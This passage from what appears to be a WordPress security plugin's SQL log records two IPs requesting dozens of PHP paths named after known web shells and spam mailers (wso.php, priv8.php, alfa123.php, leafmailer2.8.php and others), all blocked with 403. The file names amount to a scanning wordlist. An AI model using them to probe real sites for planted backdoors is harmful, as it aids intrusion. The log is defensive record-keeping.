3.5.30729)\"}','GJPYDcb6fAKWmz0rVFkCtwng',0,1674426489.4686,215,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NkyeYlQDvOdmF0nxRfagL5hj',0,1674426490.3752,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WC5n0ZBfTy4Uo8DjkLcOQ9zm',0,1674426491.2326,161,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VX6iymJrKgvSY4bTDHBUcLF3',0,1674426492.0954,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VUSCtJ1spclXam4AGHBgT2LZ',0,1674426492.9509,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ant6M0iHEUY3N54mcxObTfKd',0,1674426493.8235,187,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3rQuZC0JhlzKOUn51w8XE2Ya',0,1674426494.7281,182,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4xc8IoVeTa6hJL7su31BpKzr',0,1674426495.6332,207,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eVCKMN07rvYtGTnE1pQLBo3i',0,1674426496.5461,203,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AnUpcuCZSmXLW8yNzDvOFxPa',0,1674426497.4427,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ldakWF8VpvCjbztXoOENLIrJ',0,1674426498.3073,156,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EYdMtUnZqvh5XlrIF1iRHT7j',0,1674426499.1554,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1KrO0gMTuAfQCDZm7W8EP9qc',0,1674426500.0635,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IOxsw4t1EZP2TXjHRfnvY0Lg',0,1674426500.9315,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','j049nxu5LOq3UalRgeNAiWJz',0,1674426501.7940,187,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iIapMzvPLuKDSFQrH1lsnYGx',0,1674426502.7017,185,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AGo0ysqj34JTweEbaznlRLFZ',0,1674426503.5873,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AwKFderPNlDGspiS1c5BjTqg',0,1674426504.4562,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','x2ghfQkDWo5iUAqTFpBerLS8',0,1674426505.3285,181,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1SgRTvHNEnCwD4bzPK37Wjp0',0,1674426506.2286,198,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JX4evmhqVf8NkO6aiS7djEIP',0,1674426507.1765,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3oaStYXF0gWjlI9ni8cvkGmC',0,1674426508.0242,187,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qoKHT319wGUtPFmxON7rcJAg',0,1674426508.9253,281,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OxPkWX08pQhV3eLTDIfbtw9a',0,1674426509.9973,159,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lkhfmXbLeOGBqTWxIwD1ECS7',0,1674426510.8678,192,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0Y5tVpUkjP2HrKSFCN7lbRIs',0,1674426511.7593,222,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','i4MS0HqfjAFxkwK6nGEZeN9g',0,1674426512.6941,173,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jsQGdYUS01Ewar6Fbh8Ov9Vi',0,1674426513.5920,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AHqun7yoC5PEZt1gUh9OMGFj',0,1674426514.4615,181,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','K3gCzpJcli4Rq5V9jFfhUA2G',0,1674426515.3319,219,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','utXlhsKZ8HNmiDbk3zcaURM7',0,1674426516.2730,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Hz2YNkRbxVnM9XS5m6o7vdKw',0,1674426517.1451,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9heRWjdo8aSAMtlXPONisxH3',0,1674426518.0127,200,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sMZRdYV15iDOcb9LrgP0GSnW',0,1674426518.8977,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','64ZlX28kSeaPhwqJMBYrKIUo',0,1674426519.7964,189,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','viIQBLwDt56MXTqKF3r2yxOH',0,1674426520.6744,173,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EoJ9jsmvMiOz4lxGfqkSFYgD',0,1674426521.5614,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','fwNSspqQLyonRO2CagXGzHUe',0,1674426522.4476,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','q1LJTYDeprkAlGOZfPbgUBhE',0,1674426523.3179,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9Bxnzoi7dcsg6LvjybhqXOF2',0,1674426524.2380,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XCZdJ3nbmHA15ywQORMVesIr',0,1674426525.1448,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OTunWtzMrDisqhcKZRFwPC9p',0,1674426526.0014,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JLPqyv8ehB0FIolSt7f9rxkO',0,1674426526.9091,240,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JbeLBWGcnDvA73mp0qfjYEdS',0,1674426527.8763,215,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','moOthPQJNxsnYg76MVAIu5eF',0,1674426528.8054,195,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nGHRbFVdIWU9O4KPS1wjpy7l',0,1674426529.7209,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','i3f9pNmxzTABZ4wlLtRI2k7G',0,1674426530.6329,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','McYP0VbsfwShlpKzBTUgG2AI',0,1674426531.5216,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9QH1pSilX0E8UnkMWOcZL5so',0,1674426532.3950,199,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','slE48ROq3wbHn0zrjhM6dNyt',0,1674426533.3043,231,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','y2pINge5BxV81LPA4zEjZCJ6',0,1674426534.2466,191,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1V9806WO3ALXxSBbrnjKyQHu',0,1674426535.1597,204,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','f7xIOpAnYT2WE6rbyBN0LMP8',0,1674426536.0558,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5DOpL4w8NZsIET2iR9AY36mH',0,1674426536.9226,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZmInXhwWeb23uRkKjfVdvDEq',0,1674426537.8147,158,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lsvVycrptRCKY38oz6ub1fJ0',0,1674426538.6615,160,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Lf1SMBEqiGINHXlbQOVxdg3s',0,1674426539.5146,218,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','veA3TptkXGa58ZKmyoxEinl2',0,1674426540.4530,179,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','14A30keWwPKgmj2HEtJbBc6l',0,1674431381.8403,246,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1GkUaroAqbjW8ORV4Tx3lguH',0,1674431382.8200,186,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PlrXGRoUgEfpq3MVh4nyuL7m',0,1674431383.7627,249,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6kZDdKOvWw5asCVuN3LpSGfT',0,1674431384.7790,217,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-conetnt/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7jAmI6LONRokFT3BJM0C2pzX',0,1674431385.7548,186,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-admin/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AeqVQjBmDXIiRKNuhWH6T3Ew',0,1674431386.7307,173,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-content/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SZMH9vdquyj0rVUgtJeWXcl2',0,1674431388.0111,167,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cqUmryjFwaRQLeJp4sPAbTCl',0,1674431388.9367,198,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rLCQ1bBkSaTJAEIs5tpZ7mM3',0,1674431389.8978,227,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/leaf-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9rqVP8bmMBFGI75TveAfY0ya',0,1674431390.8797,162,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RiuxosEO9wqrSMQK1W2JzPfm',0,1674431391.7876,173,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x97j1SgiyDYuNIOfHRk8V3z5',0,1674431392.7227,193,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zXQSlpex4MWNYTZdfcyVGi2B',0,1674431393.6807,320,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/wp-includes/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VtAmM2h9osbqwP7nr4JuDfH5',0,1674431394.7885,327,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/.tmb/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lhjsAc0r1yuI8QxC4nV2dBt3',0,1674431395.9173,301,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/mailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3tXbQTYIGCiH5jcxse7ayq6U',0,1674431396.9831,253,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nNk6mbvgdB4LiswPrJRD8QS9',0,1674431398.3095,207,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Labo1BQqv39eTgX6KuxOWcIh',0,1674431399.2702,189,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OtD5UrFXQiAnE1jxmGNPTsvM',0,1674431400.2195,225,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HEZvDpRAeJl9Csi2tLUcbGr7',0,1674431401.2112,180,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Pac9yr8boq0TXfpwQgH72UMO',0,1674431402.1223,207,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kLghqR6swiKUCT1aN8pWQmDI',0,1674431403.0806,197,'','GET',403,0,700,0,1,'',0),('20.14.84.163',336483491,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) 